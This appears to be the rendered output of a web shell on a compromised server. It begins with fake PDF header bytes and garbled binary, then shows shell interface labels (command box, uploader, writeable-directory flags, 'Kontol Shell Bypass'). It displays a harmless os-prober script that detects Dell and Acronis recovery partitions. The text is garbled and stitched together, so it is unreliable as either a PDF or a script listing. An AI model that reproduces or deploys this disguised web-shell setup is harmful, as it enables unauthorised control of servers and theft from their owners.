%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/lib/os-probes/mounted/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/lib/os-probes/mounted/30utility
#!/bin/sh
# Detects utility (hw vendor recovery) partitions.

. /usr/share/os-prober/common.sh

partition="$1"
mpoint="$2"
type="$3"

# Weed out stuff that doesn't apply to us
case "$type" in
	vfat)	debug "$1 is a FAT32 partition" ;;
	msdos)	debug "$1 is a FAT16 partition" ;;
	fat)	debug "$1 is a FAT partition (mounted by GRUB)" ;;
	*)	debug "$1 is not a FAT partition: exiting"; exit 1 ;;
esac

# Dell Utility partitions have partition type 0xde, but no idea how to
# cleanly detect that from shell
if item_in_dir -q dellbio.bin "$2" && \
   (item_in_dir -q delldiag.exe "$2" || item_in_dir -q delldiag.com "$2"); then
	long="Dell Utility Partition"
	short=DellUtility
elif item_in_dir -q f11.sys "$2"; then
	long="Acronis Secure Zone"
	short=AcroneZone
else
	exit 1
fi

label="$(count_next_label "$short")"
result "${partition}:${long}:${label}:chain"
exit 0

Kontol Shell Bypass